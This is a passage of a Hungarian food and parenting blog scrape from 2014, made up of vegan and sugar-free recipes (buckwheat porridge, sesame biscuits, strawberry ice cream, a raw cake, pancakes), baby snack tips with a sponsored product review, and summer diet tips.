megörülnek, hogy VÉGRE! cukomenntes rágó. Na akkor most nézzük is meg, ha nem a cukortól édes, akkor mitől? Hát a töménytelen mesterséges édesítőktől . És bizony ez sem jobb, mint a finomított kristálycukor. Nézzünk ennek is egy összetevő listát: szorbit, izomalt, mannit, aszpartám, aszpartám-aceszulfám só, aceszulfám K, Gumi alapanyag (szójalecitint tartalmaz), Aromák, Fényező anyag: kalcium-karbonát, Nedvesítőszer: glicerin, Sűrítő anyag: gumiarábikum, Színezék: E171, Fényező anyag: karnaubaviasz, Antioxidáns: BHA Szerintetek szüksége van ezekre egy fejlődő szervezetnek? Szerintem nem. 10. Sóspálcika (ropi)  Ezekből is lehet kapni jót és kevésbé jót. Egy átlagos ropi összetevői: búzaliszt, sütőmargalin (növényi olajok és zsírok, ivóvíz emulgeálószer: zsírsavak mono és trigliceridjei, étkezési só, savanyúságot szabályozó anyag: citromsav, színezék: béta-karotin, aromák), finomított napraforgó étolaj, kristálycukor, élesztő, konyhasó (2%), tej, ivóvíz, savanyúságot szabályozó anyag: nátrium-hidroxid.  Nos, kezdem azzal, hogy a finomított lisztből készült ételeket érdemes kerülni. Ugyanis ezek a bélben csirízként szépen összeragadnak, és összetapasztják a bélbolyhokat. Ezzel az értékes tápanyagok felszívódását gátoljuk. Valamint tudjátok, hogy hogyan készül a finomított étolaj? Nos, ezt olvasd el. Ezek után döntsd el, hogy megvásárolod-e.  Persze ne csapjanak be a jól hangzó szavak, hogy Tönkölybúzás sóspálcika. Ebben az esetben is fordítsuk meg a csomagolást. Ez az egyszerű ropi jócskán tartalmaz összetevőket: tönkölybúzaliszt (34,5%), teljeskiőrlésű búzaliszt (34,5%), ivóvíz, növényi zsír, kristálycukor, étkezési só (min. 2%), élesztő, tejsavópor, fényező anyag (nátrium-hidroxid), lisztjavító szer (búzamalátaliszt, emulgeálószer: zsírsavak mono- és digliceridjeinek mono- és diacetil bórkősav észterei; szójaliszt, emulgeálószer: zsírsavak mono- és digliceridjei, étkezési só, lisztkezelőszer: aszkorbinsav, enzimek: amilázok) 10+1 Virgács  Szerintem ne a mikuláscsomagba tett virgáccsal akarjuk fegyelmezni gyerekeinket, és kiemelni, hogy te rossz vagy. Én sose teszek virgácsot a csomagba.  Összességében azt javaslom, hogy MINDEN ESETBEN olvasd el az összetevőket. Ez alapján el tudod dönteni, hogy az a finomság, amit a gyerekednek szeretnél adni, megvásárold-e.  Ezek után felmerül a kérdés, hogy akkor mit is tegyünk a mikuláscsomagba, hogy a gyerkőc örüljön neki, és mi felnőttek, lelkiismeretfurdalás nélkül adjuk. Nos, a következő írásomban tippeket adok erre is.  Felhasznált irodalom:  http:/­­/­­tudatosvasarlo.hu/­­cikk/­­kinder-tejszelet-dietetikus-szemmel http:/­­/­­www.sarospatakhungaria.hu/­­szaloncukor/­­csaszarkorte+izu+szaloncukor+narancshejdarabokkal.html  http:/­­/­­www.ferrero.hu/­­csokolade/­­  http:/­­/­­kezmuvesnyaloka.blogspot.hu/­­  http:/­­/­­www.origo.hu/­­tafelspicc/­­teszt/­­20140924-ropi-sos-palcika-teszt.html?pIdx=1

Vegán baba uzsonna + SkipHop kedvezménykupon

2014. szeptember 30. Zizi kalandjai 

Vegán baba uzsonna + SkipHop kedvezménykupon Többen kértétek, hogy adjak tippeket milyen ételeket érdemes vagy jó uzsonnára, snacknek pakolni egy majdnem másfél éves babának. Ádi most már szinte ugyanazokat eszi, amelyeket mi is fogyasztunk. Tízórait ritkábban eszik, mert később szokott reggelizni (nem egy koránkelő baba), azonban a délutáni alvás után mindig van egy- vagy többféle finomság, amit megkóstol. Ez függ attól is, hogy otthon vagyunk vagy éppen úton. Ha otthon vagyunk bármilyen étel szóba jöhet, mert minden a rendelkezésünkre áll: kanál, villa, tányér, asztal, stb. Ha úton vagyunk valahova, akkor érdemes olyat csomagolni, amely könnyen fogyasztható, kézzel/­­kanállal ehető, nem maszatol túlzottan, ráadásul finom és egészséges is. Néhány tipp, hogy nálunk mi a menő snack: - szezonális gyümölcsök: alma, narancs, banán, szőlő, avokádó - szezonális zöldségek: répa, sült sütőtök - vegán sajt kockákra vágva - natúr kölesgolyó - Alnatura teljeskiörlésű ropi - almás zab palacsinta - banános palacsinta - cukormentes tripla szezámos keksz - natúr puffasztott rizs Az almát szereti egészben is enni, de vághatjuk szeletekre, kockákra, ha még nehezebben rág a baba. A narancsot többnyire megpucolva, gerezdekre szedve csomagolom el. A banánt és szőlőt önállóan eszi Ádi, az avokádót pedig vihetjük félbe vágva, folpackba csomagolva és kanállal eszi meg a húsát a baba. Ádi a répát simán elrágcsálja, a sült sütőtök pedig szintén kanállal ehető. A vegán sajthoz jól passzol a natúr kölesgolyó vagy a ropi (amely egyébként cukormentes is!). Persze mindez az őszi szezonhoz igazodik, ha nyár lenne, nyilván mást pakolnék uzsonnára. Ami az innivalót tekinti, többnyire vizet vagy almalevet viszünk magunkkal. Szeretem vidám, környezetbarát dolgokba csomagolni az uzsonnát. Beszerezés alatt vannak rozsdamentes acél dobozkák, amelyekbe sok minden tehető. Fontosnak tartom, hogy ha műanyag dolgot használok, akkor azok BPA és PVC mentesek legyenek (erről bővebben írtam itt). A Skip*Hop Magyarországtól lehetőséget kaptunk újabb termékek tesztelésére, olyan termékekére, amelyek az uzsonnáztatást teszik színesebbé, vidámabbá. Uzsonnás táskájuk 13 féle színben (állat formában) kapható. A kis ételtároló táska belseje hőszigetelt, frissen tartja a benne tárolt ételt. Tágas egyterű rekeszében praktikusan helyezhető el a szendvics, gyümölcs, snack vagy ital stb. Belső hálós zsebében evőeszköz, szalvéta is tárolható, ezenkívül beleírhatjuk a gyermekünk nevét. Könnyen tisztítható, nedves ruhával letörölhető, lemosható. Hátizsákként nem használható, csak kézben fogható vagy felakasztható (pl: a babakocsira). A kulacsaik (11 féle színben kapható) BPA-mentesek, ftalát-mentesek, és PVC-mentesek. Minden kulacsban szívószál található, amelyet flip-top kupak véd, így a kulacs nem csöpög. Az üveg és a szívószál is könnyen tisztítható, mosogatógépben mosható. Tartozik hozzá egy extra, pót szívószál is. Ádi nagyon szépen iszik már pohárból, palackból is, de a szívószállal még csak ismerkedik. Tetszik neki, ha buborékot fújok vele a kulacsba vagy a pohárba, tanítom a használatára, de egyelőre még nem a rendeltetésének megfelelően használja. Mindkét termék elnyerte a tetszésünket. Ádi uzsonnáját sokszor a táskámba tettem bele, külön volt minden, a cumisüvegtől kezdve a kis dobozkákig. Az uzsonnás táska maximálisan ki van használva, mindent egy helyre tudok tenni, Ádi pedig imádja hordozgatni, kinyitni, ki- és bepakolni belőle mindent. A kulaccsal pedig egyelőre ismerkedünk, biztos vagyok benne, hogy hamarosan menni fog a szívószállal való ivás. Anya magyaráz, Ádi koncentrál A Skip*Hop elérhető az alábbi linkeken: - weboldal - Facebook oldal Skip*Hop Magyarország és Monkie Az uzsonnás táskát és a kulacsot a {Monkie} biztosította a teszteléshez. A véleményem csakis a sajátom. ***** KEDVEZMÉNYES VÁSÁRLÁSI LEHETŐSÉG A ZIZI KALANDJAI OLVASÓINAK!!! Aki 2014. szeptember 29 és 2014. október 10-e között vásárol Skip Hop, Yeominis, Stor it vagy Frank&Fischer márkájú termékeket a Monkie oldaláról az 10% kedvezményben részesül (a végösszegből kerül levonásra). A kuponkód, amelyet megrendeléskor be kell írni a kedvezmény érvényesítéséhez: ZIZI10. Jó vásárlást mindenkinek!  

Szuper reggeli: Nyers hajdinakása pirított mandulával és kókuszreszelékkel

2014. szeptember 23. Zizi kalandjai 

Szuper reggeli: Nyers hajdinakása pirított mandulával és kókuszreszelékkel Egy újabb szuper reggeli, amit már nagyon régóta ki akartam próbálni. A nyers hajdinakása nagy népszerűségnek örvend mostanában, sok blogon felbukkan az interneten (jó ez a diós változat, de igazából nagyon sokmindennel lehet ízesíteni). Amit a hajdináról tudni érdemes… gabonaként van számon tartva, de valójában a keserűfűfélék családjába tartozik. A hajdina igen értékes vitaminforrás, mivel a B-vitamincsoport majdnem minden tagját tartalmazza. E-vitamin, B2-vitamin és B1-vitamin tartalma nagyon jelentős. Kiemelkedően magas élelmirost-tartalma. Nekem az íze a dióra hasonlít és eddig csak főzve fogyasztottam köretként és lisztként használtam fel süteményekhez. Arra készülni kell, hogy a hajdinából készült kása nyers volta miatt – hiába ásztatjuk egy éjszakán át – enyhén roppanós, noha pépesre van turmixolva. Juharsziruppal, mézzel, agavé sziruppal is jó édesíteni, de mi Ádi miatt banánt tettünk bele, így még krémesebbé vált az állaga, de ne olyanra számítsatok, mint a zabkásánál… talán nem mondható annyira puhának, viszont az íze nekem nagyon megtetszett. A recept az Oh She Glows szakácskönyvből van, amiről már írtam korábban. Minimálisat változtattam rajta. Nyers hajdinakása pirított mandulával és kókuszreszelékkel Hozzávalók 2,5 főre (2 felnőtt, 1 baba): - 1 és 1/­­2 bögre hajdina - 3/­­4 bögre mandula- vagy rizstej - 1 és 1/­­2 evőkanál chia mag - 2-3 banán, meghámozva (vagy 3 evőkanál juharszirup) - 1/­­2 teáskanál őrölt fahéj - 3 evőkanál mandulavaj (opcionális) - 1 vaníliarúd, kimagozva - pirított mandula vagy mogyoró vagy dió és kókuszreszelék, tálaláshoz A hajdinát mossuk meg és tegyük egy tálba, öntsük fel annyi vízzel, amennyi ellepi és hagyjuk egy éjszakán át ázni (vagy minimum egy órán át áztassuk). Áztatás után szűrjük le, mossuk át és tegyük a hajdinát a robotgépbe. Adjuk hozzá a mandulatejet, a chia magot, a vaníliát, a fahéjat, a mandulavajat és a banánt. Pürésítsük simára kb. 5-8 perc alatt. Kanalazzuk az elkészült kását tálkákba, szórjuk meg pirított mandulával és kókuszreszelékkel. Tipp : Ádinak bejött a nyers hajdinakása, ugyanúgy megette, mint mi! Neki viszont csak kókuszreszelékkel szórtam meg a tetejét, ő pirított mandulát nem kapott.

Életmódváltás a konyha szekrényben: avagy milyen hozzávalókra lesz szükségem az egészségesebb élethez?

2014. szeptember 9. Zöld Avocado 

Életmódváltás a konyha szekrényben: avagy milyen hozzávalókra lesz szükségem az egészségesebb élethez?Úgy érzem kell egy kis kiegészítés a receptekhez, úgy általában. :-) Tartok attól, hogy sokan megijednek majd a hosszú hozzávaló listáktól, vagy az ismeretlen super food-ok neveitől.  Mivel ez egy nem hagyományos, húsos, magyar konyha recepteket tartalmazó gasztro blog, ezért az biztos, hogy az elején sok újdonságot fogtok olvasni, és olyan hozzávalókkal fogtok találkozni, ami nincs otthon a konyhátokban, sőt, azt sem tudjátok hol lehet őket beszerezni? ;-)  desszert hozzávalók újratöltve Ne futamodjatok meg! Az egészséges ételek nem bonyolultak, csak egy kis életmód váltásra, szemlélet váltásra van hozzájuk szükség! Például mikor legközelebb a kedvenc hiper/­­szuper marketetekbe mentek vásárolni, nézzetek szét olyan polcokon és részlegeken is, ahol eddig még nem jártatok. Rengeteg érdekes és új étellel fogtok találkozni. Sokan azt hiszik, hogy az a rész a boltban, ahol a gluténmentes, és cukormentes termékek vannak, azok csak a beteg, ételallergiás emberek számára vásárolhatóak. :-) Tévedés! A gluténmentes, vagy cukormentes alapanyagok az egészséges emberek számára is egészségesek! ;-) Bátran vásároljatok cukormentes kekszeket, vagy gluténmentes tésztát a legközelebbi túrós csuszához! Nem kell megvárni, míg tényleg muszáj lesz ilyen termékeket fogyasztani.  gesztenye szív Előzzük meg a betegségeket, és ne pedig kezeljük őket! A Világ rengeteg országában (főleg az ázsia országokban) nem az a jellemző, hogy megvárják az emberek, míg betegek lesznek, és aztán betegségek tüneteit gyógyszerekkel kezelik, hanem ellenkezőleg! Már előtte tesznek azért, hogy ne legyenek betegek! Megelőznek, és nem pedig tüneteket kezelnek! A testi betegségek megelőzésének pedig az egyik legfontosabb eszköze, a helyes táplálkozás! Olyan ételek elfogyasztása, amit a szervezetünk könnyedén megemészt, tele van ásványi anyagokkal, vitaminokkal, enzimekkel, hasznos baktériumokkal, könnyen felszívódó zsírokkal, szénhidráttal, és növényi fehérjével. Az ilyen ételektől energia dúsabb, mosolygósabb, könnyedebb életet élhetünk gyógyszerek fogyasztása nélkül, ideális testsúllyal! :-) Nem kell szigorú diétákat követni, vagy magunkat sanyargatni, csak lecserélni a már megszokott alapanyagokat, egészséges, 100%-ban hasznosítható, természetes alapanyagokra a konyhában. :-) diófélék És akkor a teljesség igény nélkül néhány hozzávaló, amivel biztosan találkozni fogsz a receptjeimben. Valószínűleg még nincs a konyha szekrényedben, de érdemes lenne beszerezni őket! ;-) - GMO (gén módosítás) mentes tofu - super food: kendermag, chia mag,  goji bogyó, búzafű,  - sörélesztő pehely,  útifűmaghéj (Psylium Husk) - sós magok: napraforgómag, tökmag, fenyőmag,  lenmag, szezámmag - diófélék: dió, brazil dió, pekán dió, mogyoró, kesu dió, mandula - aszalt gyümölcsök - kókusz zsír, extra szűz  olíva olaj, szezám olaj  - szódabikarbóna - Agave szirup,  Demerara cukor, Xilit,  kókusz reszelék - teljes kirölésű tönköly liszt, rizs liszt, mandula liszt, kukorica liszt - kókusz tej, rizs tej, mandula tej - rengeteg avokádó, cukkini és lila hagyma  - csicseriborsó  - gabonák: amaranth, quinoa, hajdina, köles, kuszkusz, bulgur, zab  - friss cserepes bazsalikom és petrezselyem - Himalája só, egész fekete bors - lehetőleg organikus körülmények között termesztett zöldségek, gyümölcsök, tojások - stb. Qunioa (gabona)  Ráadásul szépen lassan, ahogy átszokunk az olyan ételek fogyasztására, melyek nagy részét meg tudjuk emészteni, tudjuk hasznosítani, azaz "tüzelő anyagként szolgál", és nem pedig csak tömjük magunkba, és raktározzuk, mint a gyors kaják nagy részét; annál inkább észre fogjuk venni, hogy egyre kisebb mennyiség is elég, ahhoz, hogy jól lakjunk. Most pedig azt gondoljátok, hogy egy marék salátával éhesek maradtok, úgyhogy, amiket írok, az baromság. Igen,én is így gondoltam korábban, mikor még a marék saláta csak tányér dísz volt a rántott hús és krumpli mellett. :-) De ma már nem így gondolom, és ma már a testem sem így gondolja! Kezd el! Próbáld ki! Változtass, és beszélgessünk róla egy fél év múlva! ;-)   aszalt gyümölcsök, diófélék Van jó pár konyhai gép, ami megkönnyítheti a munkánkat, és segíthet, hogy még természetesebb módon jussunk hozzá az alapanyagjainkhoz. Ezek nagy része még nekem sincs meg, de már rajt van a kívánság listámon! ;-) Ilyen konyhatündér például az aszaló gép, a kenyér sütő gép, a száraztészta készítő és a csíráztató gép. Ezek nélkül is lehet élni, és létezni egy vegetáriánus konyhában, de előbb utóbb érdemes beruházni rájuk.  Ami viszont elengedhetetlen már a kezdetektől fogva: mák/­­kávé daráló, turmix gép, kézi tumix, vagy mindez egyben egy multifunkciós gépben a legjobb. Ez itt nem a reklám helye, de nekem ő a társam minden nap a konyhában, és teljes mértékben meg vagyok elégedve vele, és az ára is lenyűgőzően alacsony.  Ez egy Andrew James multifunkciós készülék, ami darál, őröl, darabol, pépet készít, turmixol, gyümölcs levet présel, dzsúzt készít, és mindig minden percben a kezem alá dolgozik. :-)  Az amazon-on már 30 euróért (közel 10ezer Ft) hozzá lehet jutni. Szerintem ez nem drága egy ilyen kis mindenttudóért. ;-) Nem túl nagy teljesítményű, de egy átlagos háziasszony konyhájában bőven elég, amire képes. Azt hiszem ennyi, amit így előljáróban érdemes tudni és beszerezni a receptek elkészítéséhez. Örömteli, és egészséges gasztro alkotást kívánok mindenkinek!  Táplálkozz, ne csak étkezz! ;-)       

Vegán cukormentes tripla szezámos keksz

2014. augusztus 23. Zizi kalandjai 

Vegán cukormentes tripla szezámos keksz Ez a keksz igazából baba keksznek indult, vagyis Ádinak akartam végre kekszet sütni, mert még sohasem evett. Tudtam, hogy vegán és cukormentes lesz és valószínűleg kerül majd bele banán, de a többi hozzávalót még nem sejtettem mi lesz. Néhány hete belefutottam a szezámlisztbe és kitaláltam, hogy ezzel fogom gazdagítani a kekszet. Isteni magának a lisztnek az illata, de amikor összekevertem a többi hozzávalóval, majd a kekszek a sütőbe kerültek, mennyei illatok járták be a lakást. A szezámlisztnek magas a fehérjetartalma, így kiváló vegetáriánusok és vegánok számára. Ezenkívül magas a vas, a magnézium, a kálcium és a cink tartalma is. Kiváló sűrítésre is, én azonban sokkal inkább tudom elképzelni sütikben, mint, amilyen ez a keksz is. A szezámliszten kívül került a kekszbe tahini (ha nem kaptok, saját magatok is készíthettek tahinit), valamint a tetejére szórtam szezámmagot, szóval ez egy fullos szezámos keksz lett. Ha nem juttok szezámliszthez, helyettesíthetitek zab- vagy hajdinaliszttel. A kókuszolaj és a tahini miatt ez egy puha keksz, de úgy gondolom, hogy babának a legmegfelelőbb az állaga és nem baj, hogy nem ropogós. Igazából három banánt tettem volna bele, hogy még egy kicsit édesebb legyen – így a felnőtt ízérzékhez jobban alkalmazkodott volna -, de csak kettő volt itthon. Aki édesebben szeretné fogyasztani, az mindenképpen három banánt tegyen bele! Vegán cukormentes tripla szezámos keksz Hozzávalók kb. 18-20 db-hoz: - 2 db érett banán, meghámozva, villával pépesre törve - 60 g kókuszolaj - 50 g szezámliszt - 50 g tönköly fehérliszt - 5 evőkanál rizstej - 1 evőkanál tahini - 2 teáskanál szódabikarbóna - 1 vaníliarúd kikapart magjai - pici csipet só - szezámmag Egy tálban keverjük össze a száraz hozzávalókat: szezámliszt, fehérliszt, szódabikarbóna, só. Egy másik tálban keverjük össze a pépesre tört banánokat a kókuszolajjal, a rizstejjel, tahinivel és vaníliával. Jól keverjük el, majd öntsük a száraz hozzávalókhoz. Puha, enyhén ragacsos tésztát kell kapnunk. Melegítsük elő a sütőt 180C fokra és béleljünk ki egy nagy tepsit sütőpapírral. Fagyis- vagy evőkanállal adagoljunk gombócokat a sütőpapírra és szórjuk meg a tetejüket szezámmaggal. 15-20 percig süssük, amíg aranybarnák lesznek. Ádi is jóváhagyja a kekszet

Heves jeges jégkrémek

2014. július 17. Zizi kalandjai 

Heves jeges jégkrémekIgaz hűlt ma egy kicsit az idő, de reméljük lesznek még nagyon meleg napok, amikor jól jönnek a hűsítő jégkrémek. Összegyűjtöttem nektek a blogon szereplő jégkrémeket, amelyek mind vegánok, vannak köztük cukormentesek is. Igyekszem készíteni újakat is, már van a fejemben néhány recept ötlet! A legkülönlegesebb a csokoládé jégkrém pirított mandulával. A cím alapján nem tűnik különlegesnek, viszont a hozzávalókat megnézve, egyből kiszúrjuk a kakukktojást: avokádó! Micsoda? Igen, az avokádó teszi krémessé ezt a finom csoki jégkrémet! Kihagyhatatlan! Recept itt! A csodaszép rózsaszín jégkrém epres kókuszos belsőt takar. Igaz, friss eper már nem igazán van a piacokon, de málnával és szederrel is kiváló! Recept itt! Banán földimogyoróval keverve? Igen! Ebben az esetben mindkettő krémessé varázsolja a jégkrémet, amelyet kakaóval fűszereztem. Recept itt! Mandulavaj és apró kis piros ribizli golyócskák… kókusztejjel keverve. A ribizlik szétpattannak a szánkban és fanyarságukkal ellensúlyozzák a krémes, édes jégkrémet. Recept itt! Egy nagyon egyszerű gyümölcsös jégkrém sárgabarackból citromfűvel fűszerezve… baba- és gyerekbarát! Recept itt! A végére pedig egy igazi különlegesség: kávés-tonkababos jeges trüffel golyók. Na, nem is én voltam az elkövető, hanem Praliné Paradicsom Zsuzsi, aki tavaly szeptemberben vendégeskedett a blogomon ezzel a finomsággal. Recept itt!

Vegán 5 perces krémes eper fagylalt

2014. június 18. Zizi kalandjai 

Vegán 5 perces krémes eper fagylalt Végre fagylalt szezon! Tavaly nyáron elmaradt a jégkrém, fagyi készítés, mert az aprócska mélyhűtő fakkunk anyatejes zacskókkal volt tele. Na, de majd most nyáron! Tervbe is van véve néhány cukormentes vegán jégkrém készítése, hogy Ádival is megismertessük a hűsítő csodát. A leginkább baba barát fagylalt ez az egyszerű vegán cukormentes banános változat. Egyszerű, gyorsan elkészül és egyetlen egy alapanyag kell hozzá, banán! A mini mélyhűtő fakknak köszönhetően fagylalt készítő gépünk sincs sajnos – nem férne be -, tehát nálam többnyire a jégkrémek jöhetnek szóba, ha hűsítő desszertre vágyunk. Vagy az olyan fagylaltok, amelyek elkészítésük pillanatában már krémesek és azonnal tálalhatók, fogyaszthatók. Ilyen a fentebb említett banános változat és ez az epres is. A titka, hogy fagyasztott eperből készül, a krémességet pedig a joghurt adja. Készülhet valódi joghurtból, azonban én szójajoghurtot használtam, így vegán változatban készült el. Nagyon kevés juharszirupot adtam hozzá édesítésnek, de olyan kevésnek bizonyult, hogy egyáltalán nem édesítette meg, szóval mindenki ízlésének megfelelően édesítse. Először úgy terveztem, hogy veszek friss epret, lefagyasztom és abból készítem, de aztán az egyszerűség kedvéért úgy döntöttem, hogy veszek inkább fagyasztott epret. Tényleg öt perc alatt elkészül! Vegán 5 perces krémes eper fagylalt (Recept: Just A Taste) Hozzávalók: - 4 bögre (kb. 500 g) fagyasztott eper - 1/­­2 bögre szójajoghurt - 3 evőkanál juharszirup vagy méz (ha édesebbre szeretnénk, tegyünk bele többet) - 1 bio citrom reszelt héja - 1 evőkanál frissen facsart citromlé (A recepthez használt bögre 250 ml-es.) Tegyük az összes hozzávalót a robotgépbe és pürésítsük simára, krémesre kb. 5 perc alatt. Tálaljuk azonnal vagy tegyük dobozba és be a mélyhűtőbe. Mi néhány órával később elővettük újra és még mindig krémes volt az állaga. Ne felejtsétek el a nyereményjátékot! Szerda éjfélig játszhattok a gourmet csomagért. Szeretném mindenkinek megköszönni a kommentet, mert ez egy szuper gyűjtőhelye lett a “Londonban feltétlen meg kell nézni” helyeknek. Bárcsak holnap indulnék újra és végigjárhatnám azokat a helyeket, amelyeket ti írtatok meg és számomra is újdonságként hatottak. Szóval, aki Londonba készülődik, ne felejtse átfutni a listát!  

Nyári Bikini alak – Étkezési tippek

2014. június 1. Fittanyuka 

Nyári Bikini alak – Étkezési tippek   Nyakunkon a strandszezon, ilyenkor minden nőtársam érez valamiféle stresszes érzést a fürdőruha szezon előtt. Kilóg itt, ott egy kis párnácska, szűkebbek a nyári ruhák, gödröcskék a fenék és combrészeken… Nem szükséges, hogy fitness modell alkatunk legyen, nem ez a cél, inkább csak az, hogy jól érezzük magunkat a bőrünkben, tudjuk azt, hogy tettünk lépéseket, hogy egészségesebbek, karcsúbbak legyünk és feszetelenebbül élvezzük a nyári napsugarakat bikiniben a strandon, vízparton. Ezek az étkezési tanácsok segítenek, hogy eltűnjenek a párnácskák, feszesebb legyen a bőr és nagyobb legyen az önbizalmunk:)! A következőket töröld a menüdből, hogy gyorsabb és teljesebb legyen a siker:  - Fehér cukor, ( nádcukor is) és minden ami tartalmazza!  - Állati tej,-tejtermékek,  - Fehér búzaliszt  - Feldolgozott élelmiszerek, mesterséges ízfokozók ( glutamát)!!  - Szénsavas italok Első lépés: Vízfogyasztás! Nincsen méregtelenítés ha nem elég a szervezet számára a vízmennyiség. 20 testsúlykilogrammonként 1 liter a szükséges mennyiség a sejtek hidratáltságához. Sokszor nem éhséget érzel valójábna, hanem a szervezeted szomjazik. Az elején nehéz amíg kialakul az új szokás: hogy iszol kellő mennyiségű vizet. A  folyadék nem leves, nem üdítő, nem gyümölcslé, hanem szűrt vagy szénsavmentes ásványvíz. Tipp: ne indulj el otthonról víz nélkül, mindig legyen nálad és elosztva a nap folyamán idd meg a neked szükséges mennyiséget. A napot kezd és zárd egy nagy pohár vízzel!   Második lépés: Reggelizz! Reggel gyors az anyagcsere, a nap ezen szakaszában fogyaszd az édes ízeket: gyümölcsök, teljes értékű pelyhek, pl: zabpehely, müzlik                  ( cukormentesek). Ha nem szoktál reggelizni, akkor egy shake vagy turmix, például zöld turmix legyen a reggelid. Reggeli receptek!   Harmadik lépés: Uzsonna és nasik az étkezések között: A délelőtti órákban ez lehet egy vagy maximum kétféle gyümölcs, zöld turmix, nyers olajos magvak (1-2 marékyni max.), fehérje shake növényi tejjel. Délutáni szakaszban a gyümölcsök kivételével a leírtak. Negyedik lépés: Ebédelj! Az ebéd tartalmazzon növényi vagy állati fehérjét ha eszel húst. Társításként csakis rostban gazdag zöldségek és olyan köretek amelyek lassan felszívódó szénhidrátokat tartalmaznak: barnarizs, rizstészta, köles, teljesértékű tönköly tészta, quinoa, hajdina.  Továbbá tartalmazzon “jó”, esszenciális zsírokat, mint például: hidegen sajtolt olajok: olíva, lenmag, szezámmag, napraforgó. Ebéd receptek! Ötödik lépés: Este 18 óra után már ne vacsorázz! Este a szervezet méregtelenítéshez készülődik, ezt a folyamatot szükséges támogatni: salátákkal, vízben gazdag zöldségekkel, esszenciális zsírokkal ( hidegen sajtolt olíva olaj, lenmagolaj, avokádo, ezek a jó zsírok segítik a máj méregtelenítését). Kiegészítheted a salátát, grillezett tofuval, vagy avokádó krémmel, csicseriborsóval ( értékes növényi fehérje forrás). Saláta vacsorák!  Krémek, kencék! További tippek: - Hagyd el a kenyeret, helyette fogyassz gluténmentes szeleteket, mint pl: puffasztott rizsszelet, hajdina szelet. - Nem szükséges a kalóriákat számolgatni, mennyiségileg annyit fogyassz, mint ami a tenyereden elfér. Többször kevesebb étkezés szinten    tartja a vércukorszintet, így elkerülöd a falási és nassolási rohamokat! - Hetente egyszer, vagy kétszer jutalmazd meg magad valamilyen egészséges nasival, sütivel ami természetesen cukor nélkül, xilittel vagy steviával van édesítve és nem fehér búzalisztből készült! - Iktass be az egészségtelen, savasító kávé helyett 1-2 csésze eredeti zöld teát, amely csökkenti az éhségérzetet, gyorsítja az anyagcserét és antioxidánsokat tartalmaz! Legfontosabb: Kezdj el mozogni, sportolni, heti három alkalommal legalább, mert csak így lesz hatásos, látványos a munkád!        

Csokis-epres torta (cukormentes, nyers)

2014. május 21. VegaLife 

Csokis-epres torta (cukormentes, nyers) Hosszú félig meddig külső kényszer-szünet (a technika sorozatban felbukkanó csínjai) után egy "költeménnyel" jelentkezem. A torta szintén megrendelésre készült. Mondhatni, hozzáadott cukrot nem tartalmaz. Sem nyírfa-, sem iparilag előállított gyümölcs-, sem kókuszvirág cukrot, sem mézet. Tulajdonképpen nyers kategóriába tehető, bár a zabpehely készítési eljárás miatt kicsit mégis tétovázva írom le, hogy nyers. Vitaminbank szerint: "A gabonapelyheket gőzöléssel és hengerek közötti lapítással állítják elő, legtöbbször a teljes gabonaszemből, ezért az egész gabonaszem összes tápanyagait tartalmazzák. Biológiai értékük jelentős. A zabot, az árpát, a hajdinát, és a kölest hántolják pelyhesítés előtt, a búza és a rozs azonban héjasan pelyhesíthető." Nyers vagy sem a képen szereplő gyönyörűség, meg kell hagyni, nem csak kinézetre kívánatos. Viszont előnye, hogy tömény édesség, így nem nagyon lehet sokat enni belőle. Másik előnye, hogy gyorsan kész. Arról nem beszélve, hogy jönnek a meleg nyári napok, amikor a sütőt nem szívesen kapcsoljuk be, akár más gyümölccsel díszítve is elkészíthetjük, ajándékba, hétvégi desszertnek, vendégváró falatnak. A  torta-alap receptje: Hozzávalók: 1/­­2 kg darált zabpehely 15-20 dkg kókuszreszelék víz 3 érett banán Elkészítés: A zabpelyhet és az enyhén megpirított kókuszreszeléket egy tálban összekeverjük, villával szétnyomkodott banánt keverünk hozzá, és annyi vizet öntünk rá, hogy az egészből egy nagy gömböcöt, egy golyót tudjunk gyúrni. Frissen tartó fóliával egy nagyobb tortaformát kibélelünk (a fólia nagyobb legyen, mint a forma, a magasabb peremét is érje) és a zabpelyhes alapot beleformázzuk. Jól belenyomkodjuk. Az alábbi csokikrémet elkenjük rajta, majd ötletünk szerint dekoráljuk. Ahogy a képen is látható, eper került a tetejére.   A  csokikrém receptje: Hozzávalók: - 2 db érett nagy avokádó - 2-3 dkg karobpor (mivel megrendelésre készült, kakaót használtam - abból több kell -, bár a karob egészségesebb) - 5 dkg kókuszolaj - 12-14 dkg datolya, meleg vízben áztatva legalább fél óráig - 1 csipet tengeri só   Elkészítés: Vegyük elő a turmixgépet (vagy egy erős aprítógépet) és a fentieket mindet, ebben a sorrendben tegyük bele. Indítsuk el, és hamarosan látni fogjuk hogy milyen fantasztikus krémet kapunk végeredménynek. Olyan krémet, mint a csokitorták csokikrémje. A kész krémet egyszerűen elkenjük a zabpehelyből készült tésztán, ennek a tetejére jöhetnek az eperszemek. Hűtőben tároljuk tálalásig. Tálalás előtt a fóliával kiemeljük a formából, lehúzzuk alóla a fóliát, az oldalát reszelt (előtte megmosott) narancshéjjal szórjuk meg. Egy szép tálcára téve tálalhatjuk is. Nagyon kiadós torta olyan értelemben, hogy nem sokat bír az ember belőle enni még akkor sem, ha édességfüggő.  

Palacsinta tej és tojás nélkül

2014. április 29. BioBrigi 

Palacsinta tej és tojás nélkülJelen esetben zab és hajdinaliszt keverékéből, hogy legyen benne lúgosító gabonaféle is (ami egyébként fűféle, mint tudjuk, de nem számít). A tészta, mint minden ilyen típusú keverék, könnyebben szakad, de ha nem hagyjuk túl hígra a tésztát, és vékonyra a palacsintát, nem nehéz vele boldogulni, ráadásul egy könnyű palacsintát kapunk cserébe. Bevallom őszintén, nem is nagyon próbáltam késsel fordítgatni, inkább feldobtam, és úgy fordítottam meg. Nem bonyolult, hamar megtanulja az ember, azután pedig már ha benne van a lendület a kezedben, megy, mint a karikacsapás. (Komolyan gondolom.) Egyszerűen először csak megmozgatod, hogy érezd, mire számíts, majd egy hirtelen picit előre, és felfelé irányuló mozdulattal feldobjuk. Utána már csak lavírozol, hogy elkapd lenn. :) A leírt mennyiség kb. 15 palacsintához elég, de sütője válogatja. Hozzávalók: 2 bögre zabliszt 1 bögre hajdinaliszt 1/­­3 bögre olivaolaj (bőven) 2 bögre szójatej 2 bögre szénsavas ásványvíz (szűken) 25 csepp sztívia /­­2 ek nyírfacukor vanília 1 csipet só cukormentes lekvár /­­ reszelt alma dióval, vagy mákkal /­­ kölestúró Először a száraz anyagokat keverjük össze, majd hozzáadjuk a folyadékokat részletekben. Amikor sima a tészta, felforrósítjuk a palacsintasütőt, és közepes lángon sütjük a 